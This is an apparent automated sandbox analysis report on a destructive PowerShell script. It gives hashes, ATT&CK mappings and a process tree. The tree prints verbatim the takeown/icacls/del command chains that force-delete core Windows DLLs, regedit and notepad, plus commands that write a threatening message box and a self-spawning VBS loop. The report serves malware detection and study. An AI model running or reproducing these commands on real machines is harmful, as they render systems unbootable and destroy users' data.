cd80c4f9e20f6f7f2d0694ed8a21aeeedd1bb075ee6794d39fbd0b2f8f85c2f3

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15/07/2024, 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.ps1
Size

2KB
MD5

3254b5618f8278514f8e83dedb5c7996
SHA1

19b12a1ec5e94fca3c1f07b357e74fe791f001bc
SHA256

cd80c4f9e20f6f7f2d0694ed8a21aeeedd1bb075ee6794d39fbd0b2f8f85c2f3
SHA512

9e52971f389e7f0bb5663825d51a938af46fbc48ec49307c314a435ba646d458f9c5748d79099dd289efcb6ce7311bbe301f92820754f3cff11639733629d897

Score

8^/10

discovery execution exploit

Malware Config

Signatures

Possible privilege escalation attempt 28 IoCs

exploit

pid	Process
3044	takeown.exe
2760	icacls.exe
2764	takeown.exe
3008	icacls.exe
748	takeown.exe
2096	takeown.exe
2444	icacls.exe
2252	icacls.exe
2824	takeown.exe
2640	icacls.exe
3012	icacls.exe
2300	icacls.exe
2744	icacls.exe
1692	takeown.exe
2556	takeown.exe
1144	icacls.exe
2896	icacls.exe
2732	takeown.exe
2752	takeown.exe
2768	icacls.exe
2608	takeown.exe
2928	takeown.exe
2848	icacls.exe
2072	takeown.exe
2812	takeown.exe
2712	takeown.exe
1232	icacls.exe
3024	icacls.exe

Modifies file permissions 1 TTPs 28 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2300	icacls.exe
3024	icacls.exe
3008	icacls.exe
2556	takeown.exe
1232	icacls.exe
748	takeown.exe
2096	takeown.exe
2444	icacls.exe
2732	takeown.exe
2640	icacls.exe
2072	takeown.exe
2712	takeown.exe
2824	takeown.exe
1692	takeown.exe
2764	takeown.exe
2896	icacls.exe
2760	icacls.exe
2928	takeown.exe
2768	icacls.exe
3012	icacls.exe
2608	takeown.exe
3044	takeown.exe
2744	icacls.exe
2812	takeown.exe
2752	takeown.exe
2848	icacls.exe
2252	icacls.exe
1144	icacls.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\die.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2532	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

pid	Process
1376	taskkill.exe
1696	taskkill.exe
1056	taskkill.exe

Runs regedit.exe 1 IoCs

pid	Process
1496	regedit.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2532	powershell.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeTakeOwnershipPrivilege	3044	takeown.exe
Token: SeTakeOwnershipPrivilege	2096	takeown.exe
Token: SeTakeOwnershipPrivilege	2928	takeown.exe
Token: SeTakeOwnershipPrivilege	2812	takeown.exe
Token: SeTakeOwnershipPrivilege	2752	takeown.exe
Token: SeTakeOwnershipPrivilege	2712	takeown.exe
Token: SeTakeOwnershipPrivilege	2824	takeown.exe
Token: SeTakeOwnershipPrivilege	2732	takeown.exe
Token: SeTakeOwnershipPrivilege	1692	takeown.exe
Token: SeTakeOwnershipPrivilege	2608	takeown.exe
Token: SeTakeOwnershipPrivilege	2764	takeown.exe
Token: SeTakeOwnershipPrivilege	2556	takeown.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeTakeOwnershipPrivilege	2072	takeown.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeTakeOwnershipPrivilege	748	takeown.exe
Token: SeDebugPrivilege	1056	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2400	2532	powershell.exe	31
PID 2532 wrote to memory of 2400	2532	powershell.exe	31
PID 2532 wrote to memory of 2400	2532	powershell.exe	31
PID 2400 wrote to memory of 3044	2400	cmd.exe	32
PID 2400 wrote to memory of 3044	2400	cmd.exe	32
PID 2400 wrote to memory of 3044	2400	cmd.exe	32
PID 2400 wrote to memory of 3024	2400	cmd.exe	33
PID 2400 wrote to memory of 3024	2400	cmd.exe	33
PID 2400 wrote to memory of 3024	2400	cmd.exe	33
PID 2532 wrote to memory of 2688	2532	powershell.exe	34
PID 2532 wrote to memory of 2688	2532	powershell.exe	34
PID 2532 wrote to memory of 2688	2532	powershell.exe	34
PID 2688 wrote to memory of 2096	2688	cmd.exe	35
PID 2688 wrote to memory of 2096	2688	cmd.exe	35
PID 2688 wrote to memory of 2096	2688	cmd.exe	35
PID 2688 wrote to memory of 2300	2688	cmd.exe	36
PID 2688 wrote to memory of 2300	2688	cmd.exe	36
PID 2688 wrote to memory of 2300	2688	cmd.exe	36
PID 2532 wrote to memory of 2700	2532	powershell.exe	37
PID 2532 wrote to memory of 2700	2532	powershell.exe	37
PID 2532 wrote to memory of 2700	2532	powershell.exe	37
PID 2700 wrote to memory of 2928	2700	cmd.exe	38
PID 2700 wrote to memory of 2928	2700	cmd.exe	38
PID 2700 wrote to memory of 2928	2700	cmd.exe	38
PID 2700 wrote to memory of 2744	2700	cmd.exe	39
PID 2700 wrote to memory of 2744	2700	cmd.exe	39
PID 2700 wrote to memory of 2744	2700	cmd.exe	39
PID 2532 wrote to memory of 2808	2532	powershell.exe	40
PID 2532 wrote to memory of 2808	2532	powershell.exe	40
PID 2532 wrote to memory of 2808	2532	powershell.exe	40
PID 2808 wrote to memory of 2812	2808	cmd.exe	41
PID 2808 wrote to memory of 2812	2808	cmd.exe	41
PID 2808 wrote to memory of 2812	2808	cmd.exe	41
PID 2808 wrote to memory of 2848	2808	cmd.exe	42
PID 2808 wrote to memory of 2848	2808	cmd.exe	42
PID 2808 wrote to memory of 2848	2808	cmd.exe	42
PID 2532 wrote to memory of 2796	2532	powershell.exe	43
PID 2532 wrote to memory of 2796	2532	powershell.exe	43
PID 2532 wrote to memory of 2796	2532	powershell.exe	43
PID 2796 wrote to memory of 2752	2796	cmd.exe	44
PID 2796 wrote to memory of 2752	2796	cmd.exe	44
PID 2796 wrote to memory of 2752	2796	cmd.exe	44
PID 2796 wrote to memory of 2444	2796	cmd.exe	45
PID 2796 wrote to memory of 2444	2796	cmd.exe	45
PID 2796 wrote to memory of 2444	2796	cmd.exe	45
PID 2532 wrote to memory of 2720	2532	powershell.exe	46
PID 2532 wrote to memory of 2720	2532	powershell.exe	46
PID 2532 wrote to memory of 2720	2532	powershell.exe	46
PID 2720 wrote to memory of 2712	2720	cmd.exe	47
PID 2720 wrote to memory of 2712	2720	cmd.exe	47
PID 2720 wrote to memory of 2712	2720	cmd.exe	47
PID 2720 wrote to memory of 2252	2720	cmd.exe	48
PID 2720 wrote to memory of 2252	2720	cmd.exe	48
PID 2720 wrote to memory of 2252	2720	cmd.exe	48
PID 2532 wrote to memory of 2820	2532	powershell.exe	49
PID 2532 wrote to memory of 2820	2532	powershell.exe	49
PID 2532 wrote to memory of 2820	2532	powershell.exe	49
PID 2820 wrote to memory of 2824	2820	cmd.exe	50
PID 2820 wrote to memory of 2824	2820	cmd.exe	50
PID 2820 wrote to memory of 2824	2820	cmd.exe	50
PID 2820 wrote to memory of 2896	2820	cmd.exe	51
PID 2820 wrote to memory of 2896	2820	cmd.exe	51
PID 2820 wrote to memory of 2896	2820	cmd.exe	51
PID 2532 wrote to memory of 2616	2532	powershell.exe	52

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3024
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant Everyone:(F) && del/f C:\Windows\System32\user32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\user32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\user32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2300
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F) && del/f C:\Windows\System32\kernel32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\kernel32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2744
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\gdi32.dll && icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\gdi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\gdi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2848
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\advapi32.dll && icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\advapi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\advapi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2444
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ntdll.dll && icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F) && del/f C:\Windows\System32\ntdll.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ntdll.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2252
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\shell32.dll && icacls C:\Windows\System32\shell32.dll /grant Everyone:(F) && del/f C:\Windows\System32\shell32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\shell32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2824
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\shell32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2896
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ole32.dll && icacls C:\Windows\System32\ole32.dll /grant Everyone:(F) && del/f C:\Windows\System32\ole32.dll"
  2⤵
  PID:2616
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ole32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ole32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2760
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\comdlg32.dll && icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F) && del/f C:\Windows\System32\comdlg32.dll"
  2⤵
  PID:2648
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\comdlg32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2768
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\wininet.dll && icacls C:\Windows\System32\wininet.dll /grant Everyone:(F) && del/f C:\Windows\System32\wininet.dll"
  2⤵
  PID:2588
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\wininet.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\wininet.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2640
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\msvcrt.dll && icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F) && del/f C:\Windows\System32\msvcrt.dll"
  2⤵
  PID:2672
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\msvcrt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant Everyone:(F) && taskkill /f /im regedit.exe && del/f C:\Windows\regedit.exe"
  2⤵
  PID:2660
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\regedit.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\regedit.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im regedit.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\notepad.exe && icacls C:\Windows\notepad.exe /grant Everyone:(F) && taskkill /f /im notepad.exe && del/f C:\Windows\notepad.exe"
  2⤵
  PID:1452
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\notepad.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\notepad.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im notepad.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\bfsvc.exe && icacls C:\Windows\bfsvc.exe /grant Everyone:(F) && taskkill /f /im bfsvc.exe && del/f C:\Windows\bfsvc.exe"
  2⤵
  PID:1676
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\bfsvc.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\bfsvc.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1144
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im bfsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo msgbox "YOU ARE GOING TO DIE" >> %windir%\die.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1528
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo for i = 1 to 100 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2684
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo createobject("wscript.shell").run "start %windir%\loop.vbs" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2248
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo next >> %windir%\loop.vbs && start %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:464
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\loop.vbs"
    3⤵
    PID:1856

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:324

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Runs regedit.exe
PID:1496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\loop.vbs

Filesize
83B

MD5
8ee085ca996a75945a2d4b105113ffa0

SHA1
3889508589a8499bcf2b22af689cd581836a083b

SHA256
587701b740dbb0a8a7b8a528e4a2df93f0d94379ec014370c70a391052c0171a

SHA512
daad5e796dfb206201aa2e8dedb18a3e2d39ab7d002772218c27224f96ba2582a7533a1b97d27ce20cae576e00afa5902358faf0523a71f22220857bc63b373c

Download Submit
C:\Windows\loop.vbs

Filesize
91B

MD5
c40d8df9297f480185a50211ab445ea5

SHA1
83cfe62aa130c3c526aec6e0f87ce3eb95d311e7

SHA256
eecde88ab73958886e879fedfce2a8ecfa6690d3d28e570403215a2aa4c07513

SHA512
3af78490bd7775648b64d95ee165503ab6f8cb9175226b7fdc58010f747ae0e542cd18a5939fc2a4ee269e01cef9997b5ff240e9db2e48f40a2c371037397652

Download Submit
memory/2532-4-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

Filesize
4KB

Download
memory/2532-7-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2532-8-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2532-9-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-10-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-11-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2532-36-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download